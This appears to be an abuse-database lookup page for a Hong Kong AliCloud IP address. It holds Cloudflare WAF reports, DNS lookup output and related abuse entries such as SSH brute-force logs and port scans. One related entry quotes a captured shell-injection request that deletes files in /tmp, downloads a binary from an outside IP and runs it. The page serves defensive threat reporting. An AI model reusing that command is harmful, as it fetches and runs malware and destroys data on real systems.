149.129.110.135

Basic Info

City: unknown

Region: unknown

Country: Hong Kong

Internet Service Provider: AliCloud

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	The IP has triggered Cloudflare WAF. CF-Ray: 5413c457ca65849a \| WAF_Rule_ID: 1aff1cdfeb5c4074965d7cd85bfc1d4e \| WAF_Kind: firewall \| CF_Action: challenge \| Country: CN \| CF_IPClass: noRecord \| Protocol: HTTP/2 \| Method: GET \| Host: d.skk.moe \| User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 \| CF_DC: HKG. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).	2019-12-07 23:31:30

Type

Details

Datetime

attackbots

The IP has triggered Cloudflare WAF. CF-Ray: 5413c457ca65849a | WAF_Rule_ID: 1aff1cdfeb5c4074965d7cd85bfc1d4e | WAF_Kind: firewall | CF_Action: challenge | Country: CN | CF_IPClass: noRecord | Protocol: HTTP/2 | Method: GET | Host: d.skk.moe | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 | CF_DC: HKG. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).

2019-12-07 23:31:30

Comments on same subnet:

IP	Type	Details	Datetime
149.129.110.63	attackspam	WordPress brute force	2020-01-15 07:29:36
149.129.110.113	attack	The IP has triggered Cloudflare WAF. CF-Ray: 540f3edddaf0dd02 \| WAF_Rule_ID: 3b40188685924a32bf11d40edea05a27 \| WAF_Kind: firewall \| CF_Action: challenge \| Country: CN \| CF_IPClass: noRecord \| Protocol: HTTP/2 \| Method: GET \| Host: api.skk.moe \| User-Agent: Mozilla/5.0 (iPad; CPU OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1 \| CF_DC: SIN. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).	2019-12-08 03:30:45

Type

Details

Datetime

149.129.110.63

attackspam

WordPress brute force

2020-01-15 07:29:36

149.129.110.113

attack

The IP has triggered Cloudflare WAF. CF-Ray: 540f3edddaf0dd02 | WAF_Rule_ID: 3b40188685924a32bf11d40edea05a27 | WAF_Kind: firewall | CF_Action: challenge | Country: CN | CF_IPClass: noRecord | Protocol: HTTP/2 | Method: GET | Host: api.skk.moe | User-Agent: Mozilla/5.0 (iPad; CPU OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1 | CF_DC: SIN. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).

2019-12-08 03:30:45

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 149.129.110.135
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 23567
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;149.129.110.135.		IN	A

;; AUTHORITY SECTION:
.			475	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019120700 1800 900 604800 86400

;; Query time: 223 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Dec 07 23:31:25 CST 2019
;; MSG SIZE  rcvd: 119

Host info

Host 135.110.129.149.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 135.110.129.149.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
182.43.6.84	attackbotsspam	Fail2Ban	2020-07-14 22:30:06
47.254.150.124	attackspam	/shell%3Fcd+/tmp;rm+-rf+*;wget+45.95.168.230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.arm7;chmod+777+/tmp/Meth.arm7;sh+/tmp/Meth.arm7+jaws.selfrep	2020-07-14 22:33:40
197.210.53.144	attack	1594732501 - 07/14/2020 15:15:01 Host: 197.210.53.144/197.210.53.144 Port: 445 TCP Blocked	2020-07-14 22:22:16
40.114.214.239	attack	Jul 14 15:52:24 vmd17057 sshd[26491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.114.214.239 ...	2020-07-14 22:52:44
129.213.107.56	attackspam	Jul 14 15:08:14 h2779839 sshd[15570]: Invalid user jp from 129.213.107.56 port 41124 Jul 14 15:08:14 h2779839 sshd[15570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.213.107.56 Jul 14 15:08:14 h2779839 sshd[15570]: Invalid user jp from 129.213.107.56 port 41124 Jul 14 15:08:16 h2779839 sshd[15570]: Failed password for invalid user jp from 129.213.107.56 port 41124 ssh2 Jul 14 15:11:14 h2779839 sshd[15652]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.213.107.56 user=mysql Jul 14 15:11:16 h2779839 sshd[15652]: Failed password for mysql from 129.213.107.56 port 37074 ssh2 Jul 14 15:14:29 h2779839 sshd[15682]: Invalid user xe from 129.213.107.56 port 33050 Jul 14 15:14:29 h2779839 sshd[15682]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.213.107.56 Jul 14 15:14:29 h2779839 sshd[15682]: Invalid user xe from 129.213.107.56 port 33050 Jul 14 15:14:31 ...	2020-07-14 22:49:01
95.85.24.147	attack	Jul 14 14:40:47 plex-server sshd[782072]: Invalid user postgres from 95.85.24.147 port 46718 Jul 14 14:40:47 plex-server sshd[782072]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.85.24.147 Jul 14 14:40:47 plex-server sshd[782072]: Invalid user postgres from 95.85.24.147 port 46718 Jul 14 14:40:49 plex-server sshd[782072]: Failed password for invalid user postgres from 95.85.24.147 port 46718 ssh2 Jul 14 14:43:56 plex-server sshd[783079]: Invalid user toy from 95.85.24.147 port 42778 ...	2020-07-14 22:48:32
101.69.200.162	attackbotsspam	Jul 14 15:32:36 home sshd[28030]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.69.200.162 Jul 14 15:32:37 home sshd[28030]: Failed password for invalid user node2 from 101.69.200.162 port 2226 ssh2 Jul 14 15:36:20 home sshd[28477]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.69.200.162 ...	2020-07-14 22:23:24
194.58.79.69	attackbots	Jul 14 16:19:55 server sshd[5464]: Failed password for invalid user www from 194.58.79.69 port 47312 ssh2 Jul 14 16:21:31 server sshd[7426]: Failed password for invalid user wfx from 194.58.79.69 port 44146 ssh2 Jul 14 16:23:15 server sshd[9586]: Failed password for invalid user www from 194.58.79.69 port 40980 ssh2	2020-07-14 22:53:33
46.116.117.246	attackbotsspam	Automatic report - Port Scan Attack	2020-07-14 22:38:46
52.138.86.80	attack	Jul 14 16:51:21 site3 sshd\[239275\]: Invalid user palvelukanava from 52.138.86.80 Jul 14 16:51:21 site3 sshd\[239275\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=52.138.86.80 Jul 14 16:51:21 site3 sshd\[239276\]: Invalid user palvelukanava.fi from 52.138.86.80 Jul 14 16:51:21 site3 sshd\[239276\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=52.138.86.80 Jul 14 16:51:24 site3 sshd\[239275\]: Failed password for invalid user palvelukanava from 52.138.86.80 port 18785 ssh2 ...	2020-07-14 22:18:07
185.172.111.235	attackspambots	Unauthorized connection attempt detected from IP address 185.172.111.235 to port 80	2020-07-14 22:21:10
197.255.203.236	attackspambots	Wordpress attack	2020-07-14 22:33:09
81.192.178.187	attackspam	20/7/14@09:14:38: FAIL: Alarm-Intrusion address from=81.192.178.187 ...	2020-07-14 22:44:09
187.190.220.250	attackbots	Icarus honeypot on github	2020-07-14 22:34:54
92.13.148.85	attack	Automatic report - XMLRPC Attack	2020-07-14 22:48:01

Recently Reported IPs

47.75.221.106	39.68.238.132	34.92.190.238	223.104.3.150
223.73.233.86	222.82.58.128	222.79.48.154	220.181.108.149
13.129.127.247	192.244.95.151	175.184.167.54	171.34.179.71
149.129.108.175	125.118.4.30	124.225.47.233	123.232.225.10
123.160.174.146	123.145.32.68	122.96.73.26	116.252.0.40